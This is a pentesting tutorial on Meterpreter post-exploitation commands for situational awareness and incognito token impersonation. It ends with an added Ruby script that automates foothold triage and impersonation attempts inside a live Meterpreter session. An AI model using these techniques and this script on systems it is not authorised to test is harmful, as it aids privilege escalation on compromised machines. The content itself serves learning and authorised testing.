Upload: haydn-johnson

Post on 12-Apr-2017

Page 1: Meterpreter awareness

haydz | Security | April 26, 2015

Meterpreter and situational awareness

AKA WHAT COMMANDS CAN I USE WITH METERPRETER


PAGE 1

Contents

Introduction
    Assumptions
Basics: What is Meterpreter
    What does that mean?
    In summary
Upon receiving a Meterpreter session
    We must therefore find the session that we wish to interact with
    To access the Meterpreter session
Situational awareness
    Some easy to use Meterpreter commands: getuid, sysinfo, cat, pwd
    But Meterpreter is not terminal access?
Back to situational awareness
    We are currently running as the svchost.exe process in a temp directory
    In summary
Tokens, what is this about tokens
    How do I find out what token I have? getuid, incognito
    Incognito
        Use incognito
        list_tokens -u
        Attempt to impersonate with incognito: impersonate_token
Conclusion


Introduction

This report explains some key Meterpreter commands that give you a degree of situational awareness: that is, how to gain insight into system information, the user you are currently running as, the processes that are running, and other things of that kind.

Effectively this is a rehash of information that is already out there; writing about it helps me learn it, and hopefully it helps others learn as well.

Assumptions:

I assume that the reader has some prior knowledge of, or experience with, the Metasploit Framework (launching payloads and creating listeners), as well as basic information security terminology.

Basics: What is Meterpreter

If you are into pentesting/hacking you may have heard of Meterpreter or have used it. But what exactly is it?

In its most basic form Meterpreter is a shell/command-line access tool. Like a plain shell it can be delivered as a reverse or bind payload, but it comes with many more options. It is simple to use and hard to master.

The definition from Offensive Security (Metasploit Unleashed) describes it using three terms worth unpacking: it is a payload, it works by DLL injection, and it is staged.

WHAT DOES THAT MEAN?

A Payload:

In computer security the payload is the part of an exploit or piece of malware that performs the malicious action: the data sent via the exploit that carries out the attacker's intentions, such as gathering system information or looking around directories. Meterpreter is one such payload.


DLL injection:

Running code within the address space of another process. The Meterpreter code itself is a DLL loaded into the memory of a host process, such as svchost.exe or calc.exe, rather than a standalone program; the process you land in is whatever the exploit or the payload executable happened to run in, so there is no separate "meterpreter" entry to look for in the process list.

Staged:

The exploit only delivers a small first stage (the stager); once that connects back, the full Meterpreter stage is sent over the connection and the session is created. Extra functionality (extensions such as stdapi, priv and incognito) is then loaded into the running session as needed rather than being shipped up front.

IN SUMMARY

So from that we can gather that Meterpreter is something we deliver by exploiting a vulnerability; it then runs inside a process on the victim's computer and gives us commands to execute there. Additionally, we can load more functionality if and when we need it.

Upon receiving a Meterpreter session:

When a Meterpreter session comes in, msfconsole may automatically drop you into it or it may not, depending on how you set up your Metasploit listener. If the handler was started as a background job (exploit -j), the session is opened in the background and you have to interact with it yourself.

It may look like the following:

The session has been created but is running as a background job.


WE MUST THEREFORE FIND THE SESSION THAT WE WISH TO INTERACT WITH:

As we can see above, when we type sessions (or sessions -l), Metasploit lists the open sessions for us. In this case session 1 holds our win32 Meterpreter session.

TO ACCESS THE METERPRETER SESSION:

We simply type sessions -i followed by the session number, for example sessions -i 1.

The -i flag means interact with the session number you provide. Ctrl-Z (the background command) sends the session back to the background and returns you to the msf prompt.

Situational awareness

So we now have a session on the victim's machine. Where to from here? Well, before we try any privilege escalation, let's see who we are, where we are and all sorts of other goodness.

Raphael Mudge is a well-known red teamer and has a great blog post regarding situational awareness here.

The idea of situational awareness is to understand what access you have, that is, what you can and cannot do. Can you add a user in order to access the box over RDP with rdesktop? Can you run executables in order to dump passwords?

SOME EASY TO USE METERPRETER COMMANDS:

getuid

Shows the user you are currently running as (after an incognito impersonation it shows the impersonated user).

sysinfo

Prints system information: the computer name, operating system and build, architecture, system language, domain and number of logged-on users. It is closer to a trimmed-down systeminfo than to ipconfig; the network interfaces come from the separate ipconfig (alias ifconfig) Meterpreter command.


cat

Reads a file and prints its contents to the console.

pwd

Prints the directory you are currently working in on the victim (getwd is the same command).

Examples of using the commands:

BUT METERPRETER IS NOT TERMINAL ACCESS?

Well, it is and it isn't. You can drop down into an ordinary command shell (cmd.exe on a Windows target) to get normal command-line access. Because Meterpreter lives within another process, you can drop such a shell and bring it up again whenever needed, while the session itself keeps all of its extra functionality.

To drop into a shell, type shell at the Meterpreter prompt; typing exit in that shell returns you to Meterpreter:


Back to situational awareness

Meterpreter runs inside a process, so which process am I? Here comes the getpid command.

PID 1748. On its own that is not very helpful; to understand the process we are running in we need to list the processes running on the machine.

We then run the ps command to list all processes and find our process ID in that list. ps shows, for each process, the PID, parent PID, name, architecture, session, the user it runs as and the path of its executable.

WE ARE CURRENTLY RUNNING AS THE SVCHOST.EXE PROCESS IN A TEMP DIRECTORY.

The fact that we are running out of a temp directory suggests we have very few privileges, and as it turns out on this machine we are running as an IWAM account. IWAM_<computername> is a default low-privilege account created when IIS 5.1 or earlier is installed, used by IIS to launch out-of-process web applications. The path is a tell in itself: the real svchost.exe lives in the Windows system32 directory, so one running from a temp directory is our dropped payload rather than a genuine service host, which is also exactly what a defender looking at the process list would flag.

IN SUMMARY

We understand that we are most likely a low-privilege user running out of a temp directory.

We understand the system information, the operating system and computer name.


Tokens, what is this about tokens

In Windows the simple idea is that every process has an access token, and a thread can carry one of its own (an impersonation token) as well. The token states which user the process or thread is running as, its group memberships and privileges, and, if necessary, which subset of the user's rights the process has. Therefore knowing which token you have gives you better insight into your access.

For example, a normal user token lets you do the things a normal user has rights to; this may be to run allowed programs but not to download and install programs (if in an enterprise environment). A SYSTEM token gives system-level access and complete control over the victim's machine.

As this section is about privilege escalation we are assuming you do not have a SYSTEM token.

HOW DO I FIND OUT WHAT TOKEN I HAVE?

The two ways I know are getuid and incognito.

getuid

Simply lists the username you are running as.

incognito

An extension that lets an attacker impersonate another user's token; part of that is listing the tokens visible to your current process, which includes finding out what token you have.

Incognito

The aim is to impersonate a valid token on the system in order to gain more privileged access.

In order to use the functionality that incognito brings, we must load the extension:

USE INCOGNITO

This loads the incognito extension for us (use is an older alias of load, so load incognito does the same thing).


In order to attempt to steal tokens, we need to see which tokens we have access to.

list_tokens -u

This lists all tokens by unique username (list_tokens -g lists them by group). The output is split into delegation tokens, which can also be used to authenticate over the network as that user, and impersonation tokens, which are only good for local use.

From this we are able to see IUSR_<computername> tokens, which after googling turn out to belong to a similar account with similarly limited privileges.

The Microsoft documentation regarding IIS accounts is here. It tells us that:

“Internet Guest Account (IUSR_<computername>)

The Internet Guest account is used for anonymous access to management points.”

So we can see the tokens of a guest account, which would appear not to be helpful at this time.

ATTEMPT TO IMPERSONATE WITH INCOGNITO

impersonate_token

This command attempts to impersonate the specified token, so that from then on our commands hopefully execute with the access that token gives.

Meterpreter informs us that we were successful in impersonating the token. However, if we use the getuid command we can see that we are still using the ID of the same account. For an unknown reason the success was reported incorrectly.


A write-up on Metasploit Unleashed shows successfully impersonating a SYSTEM token, with getuid reporting the new identity afterwards.
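The following is an added example, not code from the original report, that automates the two checks described in this report: on page 6, correlating getpid with the ps list to judge the foothold (which user, which process, is it running from a temp directory, is it an IIS IUSR/IWAM identity), and on page 8, verifying an impersonate_token with getuid instead of trusting the success message, and calling rev2self when the identity did not change. It is written in Ruby against the Meterpreter client API that the console commands call underneath (client.sys.config.getuid, sysinfo and revert_to_self; client.sys.process.getpid and get_processes; client.incognito.incognito_list_tokens and incognito_impersonate_token) and is meant to be pasted into the irb command of a Meterpreter session, where that API is exposed as client; it assumes load incognito has already been run. FakeClient, the host name WEBSRV01, the process rows, the token names and the banner text are constructed stand-ins so the helpers can be exercised offline; the only values taken from the report are PID 1748, svchost.exe in a temp directory and the IWAM/IUSR accounts.

```ruby
# Added example (not from the original report). Helpers for the checks on
# pages 6 and 8, written against the Meterpreter client API that the console
# commands call underneath. Use from `meterpreter > irb`, where the session is
# exposed as `client`; assumes `load incognito` has already been run.
# FakeClient further down is a constructed stand-in so this runs offline.

TEMP_MARKERS      = ['\\temp\\', '\\tmp\\'].freeze     # path fragments of scratch directories
LOW_PRIV_PREFIXES = ['IUSR_', 'IWAM_'].freeze         # default IIS 5.x identities

# Who am I, what box is this, which process am I in, and does that process
# look like a low-privilege foothold (temp directory, IIS service identity)?
def awareness(client)
  uid  = client.sys.config.getuid                      # what `getuid` prints
  info = client.sys.config.sysinfo                     # what `sysinfo` prints
  pid  = client.sys.process.getpid                     # what `getpid` prints
  me   = client.sys.process.get_processes.find { |pr| pr['pid'] == pid } # our row in `ps`
  path = me ? me['path'].to_s : ''
  account = uid.split('\\').last.to_s                  # "DOMAIN\\user" -> "user"
  {
    user: uid, computer: info['Computer'], os: info['OS'], host_arch: info['Architecture'],
    pid: pid, process: me && me['name'], path: path, proc_arch: me && me['arch'],
    in_temp:  TEMP_MARKERS.any? { |m| path.downcase.include?(m) },
    low_priv: LOW_PRIV_PREFIXES.any? { |pfx| account.upcase.start_with?(pfx) }
  }
end

# `list_tokens -u`, split into delegation tokens (also usable to authenticate
# over the network as that user) and impersonation tokens (local use only).
def list_tokens(client)
  raw = client.incognito.incognito_list_tokens(0)      # 0 = order by user, 1 = by group
  lines = ->(s) { s.to_s.split("\n").map(&:strip).reject(&:empty?) }
  { delegation: lines.call(raw['delegation']), impersonation: lines.call(raw['impersonation']) }
end

# `impersonate_token`, verified with `getuid` instead of trusting the banner.
# If the identity did not change, `rev2self` so nothing half-applied is left
# on the thread, and report the failure.
def impersonate_and_verify(client, token)
  before = client.sys.config.getuid
  banner = client.incognito.incognito_impersonate_token(token)
  after  = client.sys.config.getuid
  ok = !after.casecmp?(before)
  client.sys.config.revert_to_self unless ok
  { ok: ok, before: before, after: after, banner: banner.to_s.strip }
end

# Constructed stand-in modelled on the box in this report: IWAM identity,
# svchost.exe running from a temp directory, only an IUSR token visible.
# impersonation_works: chooses whether impersonate_token really changes the
# thread identity or (as on page 8) only claims success.
class FakeClient
  Sys = Struct.new(:config, :process)

  class Config
    attr_accessor :uid
    def initialize(uid); @uid = uid; @reverted = false; end
    def getuid; @uid; end
    def sysinfo
      { 'Computer' => 'WEBSRV01', 'OS' => 'Windows XP (Build 2600, Service Pack 3).',
        'Architecture' => 'x86' }
    end
    def revert_to_self; @reverted = true; end
    def reverted?; @reverted; end
  end

  class Procs
    def getpid; 1748; end
    def get_processes                                  # same columns as `ps`
      [{ 'pid' => 4, 'name' => 'System', 'path' => '', 'user' => 'NT AUTHORITY\\SYSTEM', 'arch' => 'x86' },
       { 'pid' => 1748, 'name' => 'svchost.exe', 'path' => 'C:\\WINDOWS\\Temp\\svchost.exe',
         'user' => 'WEBSRV01\\IWAM_WEBSRV01', 'arch' => 'x86' }]
    end
  end

  class Incognito
    def initialize(config, works); @config = config; @works = works; end
    def incognito_list_tokens(_order)
      { 'delegation' => "WEBSRV01\\IUSR_WEBSRV01\n", 'impersonation' => "NT AUTHORITY\\ANONYMOUS LOGON\n" }
    end
    def incognito_impersonate_token(name)
      @config.uid = name if @works                     # constructed banner, not the extension's wording
      "[+] Successfully impersonated user #{name}"
    end
  end

  attr_reader :sys, :incognito
  def initialize(impersonation_works: false)
    config = Config.new('WEBSRV01\\IWAM_WEBSRV01')
    @sys = Sys.new(config, Procs.new)
    @incognito = Incognito.new(config, impersonation_works)
  end
end

if __FILE__ == $PROGRAM_NAME
  c = FakeClient.new
  p awareness(c)
  p list_tokens(c)
  p impersonate_and_verify(c, 'WEBSRV01\\IUSR_WEBSRV01')                                    # ok: false
  p impersonate_and_verify(FakeClient.new(impersonation_works: true), 'NT AUTHORITY\\SYSTEM') # ok: true
end
```

Run as a script it prints the triage for the constructed session; on a real session call awareness(client) first and keep its in_temp and low_priv flags in mind before trying anything noisy. impersonate_and_verify returning ok: false is the situation page 8 ran into: the banner alone proves nothing, getuid is the check, and reverting immediately keeps the session in a known state before you try the next token.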

Conclusion

These are some fun techniques I have played with while being stuck as an IIS guest account.

The idea is to understand where you are and what you can do, and then hopefully move laterally or vertically to get to SYSTEM access.